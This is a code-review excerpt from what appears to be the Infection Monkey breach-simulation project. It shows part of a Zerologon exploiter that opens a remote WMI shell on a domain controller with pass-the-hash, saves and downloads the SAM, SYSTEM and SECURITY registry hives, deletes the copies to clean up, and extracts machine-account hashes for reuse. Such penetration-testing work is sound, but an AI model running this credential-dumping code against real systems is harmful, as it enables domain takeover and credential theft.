monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,365 @@
+
+    # so other exploiters can use these creds
+    def add_extracted_creds_to_monkey_config(self, user: str, lmhash: str, nthash: str) -> None:
+        if user not in self._config.exploit_user_list:
+            self._config.exploit_user_list.append(user)
+
+        if lmhash not in self._config.exploit_lm_hash_list:
+            self._config.exploit_lm_hash_list.append(lmhash)
+
+        if nthash not in self._config.exploit_ntlm_hash_list:
+            self._config.exploit_ntlm_hash_list.append(nthash)
+
+    def get_original_pwd_nthash(self, admin_pwd_hashes: str) -> str:
+        if not self.save_HKLM_keys_locally(admin_pwd_hashes):
+            return
+
+        options = OptionsForSecretsdump(
+            dc_ip=self.dc_ip,
+            just_dc=False,
+            system=os.path.join(os.path.expanduser('~'), 'monkey-system.save'),
+            sam=os.path.join(os.path.expanduser('~'), 'monkey-sam.save'),
+            security=os.path.join(os.path.expanduser('~'), 'monkey-security.save')
+        )
+
+        dumped_secrets = self.get_dumped_secrets(remote_name='LOCAL',
+                                                 options=options)
+        for secret in dumped_secrets:
+            if '$MACHINE.ACC: ' in secret:  # format of secret - "$MACHINE.ACC: lmhash:nthash"
+                nthash = secret.split(':')[2]
+                return nthash
+
+    def remove_locally_saved_HKLM_keys(self) -> None:
+        for name in ['system', 'sam', 'security']:
+            path = os.path.join(os.path.expanduser('~'), f'monkey-{name}.save')
+            try:
+                os.remove(path)
+            except Exception as e:
+                LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}")
+
+    def save_HKLM_keys_locally(self, admin_pwd_hashes: str) -> bool:
+        LOG.debug("Starting remote shell on victim.")
+
+        wmiexec = Wmiexec(ip=self.dc_ip,
+                          username='Administrator',
+                          hashes=admin_pwd_hashes,
+                          domain=self.dc_ip)
+
+        remote_shell = wmiexec.get_remote_shell()
+        if remote_shell:
+            _orig_stdout = sys.stdout
+            _new_stdout = io.StringIO()
+            sys.stdout = _new_stdout
+
+            try:
+                # Save HKLM keys on victim.
+                remote_shell.onecmd('reg save HKLM\\SYSTEM system.save && ' +
+                                    'reg save HKLM\\SAM sam.save && ' +
+                                    'reg save HKLM\\SECURITY security.save')
+
+                # Get HKLM keys locally (can't run these together because it needs to call do_get()).
+                remote_shell.onecmd('get system.save')
+                remote_shell.onecmd('get sam.save')
+                remote_shell.onecmd('get security.save')
+
+                # Delete saved keys on victim.
+                remote_shell.onecmd(
+                    'del /f system.save sam.save security.save')
```

Comment:
Why do you save them and then delete right afterwards?

Reply:
```python3
remote_shell.onecmd('get system.save')
remote_shell.onecmd('get sam.save')
remote_shell.onecmd('get security.save')
```
This saves them locally; we don't need them on the victim machine anymore